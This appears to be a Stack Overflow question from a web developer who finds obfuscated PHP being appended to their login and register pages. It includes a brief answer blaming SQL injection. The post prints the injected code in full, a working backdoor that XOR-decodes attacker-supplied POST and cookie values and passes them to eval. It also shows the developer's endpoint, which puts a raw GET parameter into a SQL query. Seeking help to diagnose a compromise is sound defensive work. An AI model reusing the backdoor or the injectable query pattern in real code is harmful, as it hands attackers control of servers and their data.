3

i'm running webservices on my site,but when 'm running files like login or register page a php code is running automatically and also it keep adding on same file.below is the code added automatically 

<?php $s43150 = 940;$GLOBALS['r3ba0']=Array();global$r3ba0;$r3ba0=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['x09b398d7']="\x51\x6b\x22\x57\x61\x55\x3c\x58\x65\x71\x35\x60\xa\x45\x33\x7a\x5e\x77\x27\x36\x2a\x70\x31\x29\x37\x7e\x68\x7b\x2e\x7d\x34\xd\x4f\x53\x74\x46\x73\x2f\x3b\x78\x5f\x5b\x4d\x3e\x5a\x2c\x40\x28\x59\x6a\x72\x24\x38\x54\x2b\x6c\x76\x62\x43\x32\x5c\x64\x63\x41\x9\x67\x3f\x7c\x30\x6d\x5d\x26\x75\x20\x66\x4c\x47\x25\x50\x21\x52\x79\x2d\x6f\x48\x4a\x49\x42\x4b\x56\x6e\x3a\x4e\x3d\x39\x44\x69\x23";$r3ba0[$r3ba0['x09b398d7'][81].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][68].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][74].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][61]]=$r3ba0['x09b398d7'][21].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][1];$r3ba0[$r3ba0['x09b398d7'][81].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][94].$r3ba0['x09b398d7'][57]]=$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][83].$r3ba0['x09b398d7'][72].$r3ba0['x09b398d7'][90].$r3ba0['x09b398d7'][34];$r3ba0[$r3ba0['x09b398d7'][90].$r3ba0['x09b398d7'][10].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][24].$r3ba0['x09b398d7'][22]]=$r3ba0['x09b398d7'][36].$r3ba0['x09b398d7'][72].$r3ba0['x09b398d7'][57].$r3ba0['x09b398d7'][36].$r3ba0['x09b398d7'][34].$r3ba0['x09b398d7'][50];$r3ba0[$r3ba0['x09b398d7'][65].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][10].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][19].$r3ba0['x09b398d7'][68]]=$r3ba0['x09b398d7'][36].$r3ba0['x09b398d7'][34].$r3ba0['x09b398d7'][50].$r3ba0['x09b398d7'][55].$r3ba0['x09b398d7'][8].$r3ba0['x09b398d7'][90];$r3ba0[$r3ba0['x09b398d7'][72].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][30].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][19].$r3ba0['x09b398d7'][14]]=$r3ba0['x09b398d7'][8].$r3ba0['x09b398d7'][39].$r3ba0['x09b398d7'][21].$r3ba0['x09b398d7'][55].$r3ba0['x09b398d7'][83].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][8];$r3ba0[$r3ba0['x09b398d7'][36].$r3ba0['x09b398d7'][8].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][61]]=$r3ba0['x09b398d7'][36].$r3ba0['x09b398d7'][34].$r3ba0['x09b398d7'][50].$r3ba0['x09b398d7'][40].$r3ba0['x09b398d7'][50].$r3ba0['x09b398d7'][8].$r3ba0['x09b398d7'][21].$r3ba0['x09b398d7'][8].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][34];$r3ba0[$r3ba0['x09b398d7'][49].$r3ba0['x09b398d7'][30].$r3ba0['x09b398d7'][74].$r3ba0['x09b398d7'][24].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][61]]=$_POST;$r3ba0[$r3ba0['x09b398d7'][1].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][30].$r3ba0['x09b398d7'][14]]=$_COOKIE;$s5e5=Array($r3ba0['x09b398d7'][50].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][90].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][83].$r3ba0['x09b398d7'][69].$r3ba0['x09b398d7'][22]=>$r3ba0['x09b398d7'][50].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][90].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][83].$r3ba0['x09b398d7'][69].$r3ba0['x09b398d7'][59]);$oe83a70e=Array($r3ba0['x09b398d7'][50].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][90].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][83].$r3ba0['x09b398d7'][69].$r3ba0['x09b398d7'][14]=>$r3ba0['x09b398d7'][50].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][90].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][83].$r3ba0['x09b398d7'][69].$r3ba0['x09b398d7'][30]);foreach(Array($s5e5,$r3ba0[$r3ba0['x09b398d7'][49].$r3ba0['x09b398d7'][30].$r3ba0['x09b398d7'][74].$r3ba0['x09b398d7'][24].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][61]],$oe83a70e,$r3ba0[$r3ba0['x09b398d7'][1].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][30].$r3ba0['x09b398d7'][14]])as$w67e){foreach($w67eas$t8d84db=>$bc4918ae){$bc4918ae=@$r3ba0[$r3ba0['x09b398d7'][81].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][68].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][74].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][61]]($r3ba0['x09b398d7'][84].$r3ba0['x09b398d7'][20],$bc4918ae);$t8d84db.=$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][14].$r3ba0['x09b398d7'][19].$r3ba0['x09b398d7'][24].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][74].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][82].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][74].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][68].$r3ba0['x09b398d7'][82].$r3ba0['x09b398d7'][30].$r3ba0['x09b398d7'][10].$r3ba0['x09b398d7'][94].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][82].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][14].$r3ba0['x09b398d7'][14].$r3ba0['x09b398d7'][8].$r3ba0['x09b398d7'][82].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][30].$r3ba0['x09b398d7'][74].$r3ba0['x09b398d7'][68].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][24].$r3ba0['x09b398d7'][24].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][74];$kfa8=$bc4918ae^$r3ba0[$r3ba0['x09b398d7'][90].$r3ba0['x09b398d7'][10].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][24].$r3ba0['x09b398d7'][22]]($r3ba0[$r3ba0['x09b398d7'][36].$r3ba0['x09b398d7'][8].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][61]]($t8d84db,($r3ba0[$r3ba0['x09b398d7'][65].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][10].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][19].$r3ba0['x09b398d7'][68]]($bc4918ae)/$r3ba0[$r3ba0['x09b398d7'][65].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][10].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][19].$r3ba0['x09b398d7'][68]]($t8d84db))+1),0,$r3ba0[$r3ba0['x09b398d7'][65].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][10].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][19].$r3ba0['x09b398d7'][68]]($bc4918ae));$kfa8=$r3ba0[$r3ba0['x09b398d7'][72].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][30].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][19].$r3ba0['x09b398d7'][14]]($r3ba0['x09b398d7'][97],$kfa8);if($r3ba0[$r3ba0['x09b398d7'][81].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][94].$r3ba0['x09b398d7'][57]]($kfa8)==3){eval/*ffbabfdf*/($kfa8[1]($kfa8[2]));exit();}}} ?>

and after running the file below error coming

PHP Parse error:  syntax error, unexpected '$y6956096d' (T_VARIABLE)

I'm unable to find what type of error is this. Is this a virus that coming to my files while running webservices or it is result of my code that coming after hitting the php code.

My php code

<?php
include 'dbconnect.php';

if($_SERVER['REQUEST_METHOD']=="GET"){
    $sub_product=$_GET['sub_product'];

$sql="SELECT distinct `color_name` FROM `product_of_interest` WHERE `sub_product`='$sub_product'";
    $result=mysqli_query($con,$sql);
    $row=mysqli_num_rows($result);

    if($row>0){
        while($r=mysqli_fetch_assoc($result)){
            $name=$r['color_name'];
            $res[]=array("color"=>$name);


        }
    }else{
        $res=array();
    }
    $json=array("response"=>200,"message"=>$res);
}
else{
    $json=array("response"=>408,"message"=>"Request method not accepted");
}

echo json_encode($json);
mysqli_close($con);
header('Content-type:application/json');
?>
Improve this question

1 Answer 1

Reset to default
2

You code contains a SQL injection point and your server is getting hacked over this script. You should use prepared statements.

Improve this answer
Sign up to request clarification or add additional context in comments.

1 Comment

good luck to clean all the mess. Have a look at the server log and start by forbidding attacking IPs. There's also some rules for apache .htaccess that can prevent some sql injections (try googling)

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.